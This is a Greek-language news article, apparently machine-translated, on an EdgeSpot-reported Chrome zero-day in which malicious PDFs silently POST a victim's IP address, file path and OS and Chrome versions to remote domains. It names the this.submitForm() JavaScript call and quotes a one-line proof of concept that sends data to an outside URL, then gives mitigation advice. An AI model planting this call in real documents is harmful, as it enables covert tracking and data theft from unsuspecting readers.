Υπηρεσία ανίχνευσης εξόρυξης Το EdgeSpot ανακάλυψε μια ενδιαφέρουσα ευαισθησία μηδέν για το Chrome που εκμεταλλεύεται έγγραφα PDF. Η ευπάθεια επιτρέπει στους επιτιθέμενους να συλλέγουν ευαίσθητα δεδομένα χρησιμοποιώντας κακόβουλα έγγραφα PDF που ανοίγουν στο Chrome.

Μόλις το θύμα ανοίξει τα αντίστοιχα αρχεία PDF στο Google Chrome, ένα κακόβουλο πρόγραμμα αρχίζει να λειτουργεί στο παρασκήνιο συλλέγοντας δεδομένα χρήστη.

Στη συνέχεια, τα δεδομένα διαβιβάζονται στον απομακρυσμένο διακομιστή που ελέγχεται από τους hackers. Ίσως να αναρωτιέστε ποια δεδομένα απορροφώνται από τους εισβολείς, στοχεύουν τα ακόλουθα δεδομένα στον υπολογιστή σας:

• διεύθυνση IP
• Πλήρης διαδρομή του αρχείου PDF στο σύστημα
• Εκδόσεις OS και Chrome

Προσοχή στα αρχεία PDF κακόβουλου λογισμικού

Μπορεί να εκπλαγείτε να ξέρετε ότι δεν συμβαίνει τίποτα όταν το Adobe Reader χρησιμοποιείται για το άνοιγμα αρχείων PDF. Επιπλέον, τα αιτήματα HTTP POST χρησιμοποιούνται για τη μεταφορά δεδομένων στους απομακρυσμένους διακομιστές χωρίς παρέμβαση του χρήστη.

Οι ειδικοί επισήμαναν ότι ένας από τους δύο τομείς readnotifycom ή burpcollaboratornet έλαβε τα δεδομένα.

Μπορείτε να φανταστείτε την ένταση της επίθεσης εξετάζοντας το γεγονός ότι το μεγαλύτερο μέρος του λογισμικού προστασίας από ιούς δεν είναι σε θέση να ανιχνεύσει τα δείγματα που ανιχνεύονται από το EdgeSpot.

Οι ειδικοί αποκαλύπτουν ότι οι εισβολείς χρησιμοποιούν το API Javascript "this.submitForm ()" για τη συλλογή των ευαίσθητων πληροφοριών των χρηστών.

Το δοκιμάσαμε με ένα ελάχιστο PoC, μια απλή κλήση API όπως "this.submitForm ('http://google.com/test')" θα κάνει το Google Chrome να στείλει τα προσωπικά δεδομένα στο google.com.

Οι ειδικοί διαπίστωσαν ότι αυτό το σφάλμα του Chrome εκμεταλλεύτηκε δύο διαφορετικά σύνολα κακόβουλων αρχείων PDF. Και οι δύο κυκλοφόρησαν τον Οκτώβριο του 2017 και τον Σεπτέμβριο του 2018, αντίστοιχα.

Συγκεκριμένα, τα συλλεχθέντα δεδομένα μπορούν να χρησιμοποιηθούν από τους επιτιθέμενους για την τελειοποίηση των επιθέσεων στο μέλλον. Οι αναφορές υποδεικνύουν ότι η πρώτη δέσμη αρχείων καταρτίστηκε χρησιμοποιώντας την υπηρεσία παρακολούθησης PDF της ReadNotify.

Οι χρήστες μπορούν να χρησιμοποιήσουν την υπηρεσία για να παρακολουθούν τις προβολές των χρηστών. Το EdgeSpot δεν μοιράστηκε λεπτομέρειες σχετικά με τη φύση του δεύτερου συνόλου αρχείων PDF.

Πώς να μείνετε προστατευμένοι

Η υπηρεσία εντοπισμού Exploit EdgeSpot ήθελε να ειδοποιήσει τους χρήστες των Chrome σχετικά με τους πιθανούς κινδύνους, επειδή η ενημερωμένη έκδοση κώδικα δεν αναμένεται να κυκλοφορήσει στο εγγύς μέλλον.

Η EdgeSpot ανέφερε στην Google την ευπάθεια πέρυσι και η εταιρεία υποσχέθηκε να κυκλοφορήσει ένα έμπλαστρο τέλη Απριλίου. H

Ωστόσο, μπορείτε να εξετάσετε τη χρήση προσωρινής αντιμετώπισης του προβλήματος, προβάλλοντας τοπικά τα ληφθέντα έγγραφα PDF χρησιμοποιώντας μια εναλλακτική εφαρμογή ανάγνωσης PDF.

Εναλλακτικά, μπορείτε επίσης να ανοίξετε τα έγγραφά σας PDF στο Chrome αποσυνδέοντας τα συστήματά σας από το Internet. Εν τω μεταξύ, μπορείτε να περιμένετε την ενημέρωση του Chrome 74, η οποία αναμένεται να κυκλοφορήσει στις 23 Απριλίου.